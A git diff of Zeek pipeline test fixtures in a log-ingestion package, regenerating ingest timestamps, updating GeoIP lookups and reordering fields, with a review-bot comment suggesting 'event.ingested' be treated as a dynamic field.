@@ -481,29 +491,8 @@ "port": 5170, "ip": "89.160.20.156" }, - "url": { - "full": "sip:100@89.160.20.156" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T15:58:43.416Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156", - "10.156.0.2" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041839500Z", + "ingested": "2021-12-14T14:59:20.758601166Z", "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -516,6 +505,17 @@ "connection", "protocol" ] + }, + "url": { + "full": "sip:100@89.160.20.156" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", + "transport": "udp" } }, { @@ -527,14 +527,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -583,14 +583,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -627,7 +627,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:09.041844400Z", + "ingested": "2021-12-14T14:59:20.758601548Z", "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json index e9c2a3f4562..921347ce191 100644 --- a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json +++ b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json 
@@ -43,7 +43,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-12-09T13:51:10.088827400Z", + "ingested": "2021-12-14T14:59:21.841268464Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -126,7 +126,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:10.088835100Z", + "ingested": "2021-12-14T14:59:21.841270910Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json index 4c2a129efbb..6f461c82ca7 100644 --- a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json +++ b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json @@ -1,6 +1,25 @@ { "expected": [ { + "@timestamp": "2017-10-09T16:13:19.576Z", + "file": { + "path": "\\\\\\\\admin-pc\\\\ADMIN$\\PSEXESVC.exe", + "size": 0, + "created": "2017-10-09T16:13:19.607Z", + "name": "PSEXESVC.exe", + "ctime": "2017-10-09T16:13:19.607Z", + "accessed": "2017-10-09T16:13:19.607Z", + "mtime": "2017-10-09T16:13:19.607Z" + }, + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.10.31", + "192.168.10.30" + ] + }, "destination": { "port": 445, "address": "192.168.10.30", 
@@ -26,35 +45,8 @@ "address": "192.168.10.31", "ip": "192.168.10.31" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "smb", - "community_id": "1:k308wDxRMx/FIEzeh+YwD86zgoA=", - "transport": "tcp" - }, - "@timestamp": "2017-10-09T16:13:19.576Z", - "file": { - "path": "\\\\\\\\admin-pc\\\\ADMIN$\\PSEXESVC.exe", - "size": 0, - "created": "2017-10-09T16:13:19.607Z", - "name": "PSEXESVC.exe", - "ctime": "2017-10-09T16:13:19.607Z", - "accessed": "2017-10-09T16:13:19.607Z", - "mtime": "2017-10-09T16:13:19.607Z" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.10.31", - "192.168.10.30" - ] - }, "event": { - "ingested": "2021-12-09T13:51:10.459184600Z", + "ingested": "2021-12-14T14:59:22.194791121Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -69,6 +61,14 @@ "protocol", "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "smb", + "community_id": "1:k308wDxRMx/FIEzeh+YwD86zgoA=", + "transport": "tcp" } }, { 
@@ -133,7 +133,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:10.459194Z",
+ "ingested": "2021-12-14T14:59:22.194793465Z",
 "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json
index a99565de49c..4749c52e4ce 100644
--- a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json
+++ b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json
@@ -29,7 +29,7 @@
 "ip": "192.168.10.31"
 },
 "event": {
- "ingested": "2021-12-09T13:51:10.847414400Z",
+ "ingested": "2021-12-14T14:59:22.565777314Z",
 "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -96,7 +96,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:10.847422700Z",
+ "ingested": "2021-12-14T14:59:22.565779450Z",
 "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
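Review bot: Every hunk on this line rewrites only `event.ingested`, a wall-clock value stamped when the pipeline test ran, so each regeneration of these expected files produces diff noise that buries the substantive changes elsewhere in this commit, such as the geo lookups and field reordering. elastic-package pipeline tests can declare such fields as dynamic (I believe via a `dynamic_fields` entry matching `event.ingested` in the per-test config file), after which the comparison ignores them and the fixture stops churning. Adding that to the zeek data streams would let reviewers read these fixture diffs for content rather than timestamps.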
diff --git a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json
index 51a2cf90be5..e2ba97ee070 100644
--- a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json
+++ b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json
@@ -1,6 +1,16 @@
 {
 "expected": [
 {
+ "@timestamp": "2018-12-03T22:59:47.381Z",
+ "ecs": {
+ "version": "1.12.0"
+ },
+ "related": {
+ "ip": [
+ "192.168.1.10",
+ "192.168.1.9"
+ ]
+ },
 "destination": {
 "port": 25,
 "address": "192.168.1.9",
@@ -20,34 +30,16 @@
 "fuids": []
 }
 },
+ "tls": {
+ "established": true
+ },
 "source": {
 "port": 33782,
 "address": "192.168.1.10",
 "ip": "192.168.1.10"
 },
- "tags": [
- "preserve_original_event"
- ],
- "network": {
- "protocol": "smtp",
- "community_id": "1:38H0puTqOoHT/5r2bKFUVSXifQw=",
- "transport": "tcp"
- },
- "@timestamp": "2018-12-03T22:59:47.381Z",
- "ecs": {
- "version": "1.12.0"
- },
- "related": {
- "ip": [
- "192.168.1.10",
- "192.168.1.9"
- ]
- },
- "tls": {
- "established": true
- },
 "event": {
- "ingested": "2021-12-09T13:51:11.179554200Z",
+ "ingested": "2021-12-14T14:59:22.884697435Z",
 "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -59,6 +51,14 @@
 "connection",
 "protocol"
 ]
+ },
+ "tags": [
+ "preserve_original_event"
+ ],
+ "network": {
+ "protocol": "smtp",
+ "community_id": "1:38H0puTqOoHT/5r2bKFUVSXifQw=",
+ "transport": "tcp"
 }
 },
 {
@@ -116,7 +116,7 @@
 "established": true
 },
 "event": {
- "ingested": "2021-12-09T13:51:11.179563400Z",
+ "ingested": "2021-12-14T14:59:22.884700028Z",
 "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json
index a01d7381121..e395698e4fc 100644
--- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json
+++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json
@@ -39,7 +39,7 @@
 "ip": "192.168.1.2"
 },
 "event": {
- "ingested": "2021-12-09T13:51:11.552302400Z",
+ "ingested": "2021-12-14T14:59:23.260384972Z",
 "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -96,14 +96,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -117,7 +117,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:51:11.552374200Z",
+ "ingested": "2021-12-14T14:59:23.260387718Z",
 "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -194,7 +194,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:11.552380Z",
+ "ingested": "2021-12-14T14:59:23.260388272Z",
 "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json
index 0a141e5257a..f5625bdfbb9 100644
--- a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json
+++ b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json
@@ -36,7 +36,7 @@
 "ip": "127.0.0.1"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.003932500Z",
+ "ingested": "2021-12-14T14:59:23.714621620Z",
 "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -111,7 +111,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.003940700Z",
+ "ingested": "2021-12-14T14:59:23.714624270Z",
 "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json
index 571b3271453..e4283c232ad 100644
--- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json
+++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json
@@ -42,7 +42,7 @@
 "ip": "192.168.1.2"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.452231300Z",
+ "ingested": "2021-12-14T14:59:24.056674307Z",
 "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -94,14 +94,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -115,7 +115,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.452241800Z",
+ "ingested": "2021-12-14T14:59:24.056677136Z",
 "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -166,14 +166,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -187,7 +187,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.452248100Z",
+ "ingested": "2021-12-14T14:59:24.056677613Z",
 "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -238,14 +238,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -259,7 +259,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.452253900Z",
+ "ingested": "2021-12-14T14:59:24.056677995Z",
 "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -339,7 +339,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:12.452259700Z",
+ "ingested": "2021-12-14T14:59:24.056678402Z",
 "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
index 5fb44d81860..2c757423482 100644
--- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
+++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json
@@ -7,14 +7,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -112,7 +112,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148709Z",
+ "ingested": "2021-12-14T14:59:24.817281726Z",
 "original": "{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -133,14 +133,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -238,7 +238,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148717100Z",
+ "ingested": "2021-12-14T14:59:24.817284181Z",
 "original": "{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -259,14 +259,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -364,7 +364,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148722600Z",
+ "ingested": "2021-12-14T14:59:24.817284673Z",
